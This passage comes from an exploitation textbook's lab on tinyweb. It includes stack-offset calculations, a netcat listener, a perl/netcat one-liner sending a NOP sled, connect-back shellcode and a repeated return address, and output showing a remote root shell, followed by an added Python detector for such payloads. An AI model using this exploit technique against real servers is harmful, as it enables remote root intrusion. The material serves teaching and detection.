Hacking - The Art of Exploitation, 2nd Edition

Shellcode 317

the return address uses multiple bytes. To ensure proper alignment, the sum of the NOP sled and shellcode bytes must be divisible by four. In addition, the shellcode itself must stay within the first 500 bytes of the overwrite. These are the bounds of the response buffer, and the memory afterward corresponds to other values on the stack that might be written to before we change the program’s control flow. Staying within these bounds avoids the risk of random overwrites to the shellcode, which inevitably lead to crashes. Repeating the return address 16 times will generate 64 bytes, which can be put at the end of the 544-byte exploit buffer and keeps the shellcode safely within the bounds of the buffer. The remaining bytes at the beginning of the exploit buffer will be the NOP sled. The calculations above show that a 402-byte NOP sled will properly align the 78-byte shellcode and place it safely within the bounds of the buffer. Repeating the desired return address 12 times spaces the final 4 bytes of the exploit buffer perfectly to overwrite the saved return address on the stack. Overwriting the return address with 0xbffff688 should return execution right to the middle of the NOP sled, while avoiding bytes near the beginning of the buffer, which might get mangled. These calculated values will be used in the following exploit, but first the connect-back shell needs some place to connect back to. In the output below, netcat is used to listen for incoming connections on port 31337.

reader@hacking:~/booksrc $ nc -v -l -p 31337
listening on [any] 31337 ...

Now, in another terminal, the calculated exploit values can be used to exploit the tinyweb program remotely.

From Another Terminal Window

reader@hacking:~/booksrc $ (perl -e 'print "\x90"x402';
cat connectback_shell;
perl -e 'print "\x88\xf6\xff\xbf"x20 . "\r\n"') | nc -v 127.0.0.1 80
localhost [127.0.0.1] 80 (www) open
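On the wire, the request above has a recognisable shape: a long run of 0x90 bytes followed by the same little-endian stack address repeated many times, which is exactly the structure that network intrusion detection signatures for stack-smashing payloads key on. The following Python detector is an added example written for this page, not code from the book. Its sample request is constructed, with arbitrary filler bytes standing in for connectback_shell, and the stack address range and the thresholds are assumptions chosen for the example.

```python
import re
import struct

# Constructed sample request shaped like the one sent to tinyweb above:
# a 402-byte NOP sled, 78 bytes standing in for the book's connectback_shell
# (arbitrary filler, NOT shellcode), the little-endian return address
# 0xbffff688 repeated 20 times, and the terminating CRLF.
SAMPLE_REQUEST = (
    b"\x90" * 402
    + bytes(range(1, 79))
    + struct.pack("<I", 0xBFFFF688) * 20
    + b"\r\n"
)

# Constructed ordinary request, used to show the detector stays quiet.
BENIGN_REQUEST = b"GET /index.html HTTP/1.0\r\nHost: localhost\r\n\r\n"

# Assumption: classic pre-ASLR Linux x86 userland stack range, as in the
# book's lab environment. Adjust for other platforms.
STACK_LOW, STACK_HIGH = 0xBF000000, 0xBFFFFFFF


def longest_nop_run(data: bytes) -> int:
    """Length of the longest run of consecutive 0x90 (x86 NOP) bytes."""
    return max((m.end() - m.start() for m in re.finditer(rb"\x90+", data)), default=0)


def repeated_stack_addresses(data: bytes, min_repeats: int = 8):
    """Find 4-byte words repeated back-to-back at least min_repeats times whose
    little-endian value falls in the stack range. Returns [(value, repeats)].

    Every byte offset is tried, so the repeated address does not have to be
    4-byte aligned within the stream; the range check discards rotations of
    the same bytes (e.g. 0x88bffff6) that are not plausible addresses.
    """
    hits = []
    i, n = 0, len(data)
    while i + 4 <= n:
        word = data[i:i + 4]
        count = 1
        while i + 4 * (count + 1) <= n and data[i + 4 * count:i + 4 * (count + 1)] == word:
            count += 1
        value = struct.unpack("<I", word)[0]
        if count >= min_repeats and STACK_LOW <= value <= STACK_HIGH:
            hits.append((value, count))
            i += 4 * count  # skip past the run just reported
        else:
            i += 1
    return hits


def classify_request(data: bytes, nop_threshold: int = 64, min_repeats: int = 8):
    """Return a list of human-readable findings; an empty list means nothing
    suspicious. Thresholds are assumptions for this example, not published values."""
    findings = []
    run = longest_nop_run(data)
    if run >= nop_threshold:
        findings.append(f"NOP sled: {run} consecutive 0x90 bytes")
    for value, count in repeated_stack_addresses(data, min_repeats):
        findings.append(f"repeated stack address 0x{value:08x} x{count} (return-address spray)")
    return findings


if __name__ == "__main__":
    for name, req in (("sample exploit request", SAMPLE_REQUEST), ("benign request", BENIGN_REQUEST)):
        print(f"{name}: {classify_request(req) or ['no findings']}")
```

The check keys only on structure (run length and repeated words), so it needs no copy of the shellcode and no knowledge of the vulnerable program; the same blindness means a production rule would widen the byte set beyond 0x90 and tune the stack range to the platform being protected.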

Back in the original terminal, the shellcode has connected back to the netcat process listening on port 31337. This provides root shell access remotely.


reader@hacking:~/booksrc $ nc -v -l -p 31337
listening on [any] 31337 ...
connect to [192.168.42.72] from hacking.local [192.168.42.72] 34391
whoami
root

The network configuration for this example is slightly confusing because the attack is directed at 127.0.0.1 and the shellcode connects back to 192.168.42.72. Both of these IP addresses route to the same place, but 192.168.42.72 is easier to use in shellcode than 127.0.0.1. Since the loopback address contains two null bytes, the address must be built on the stack with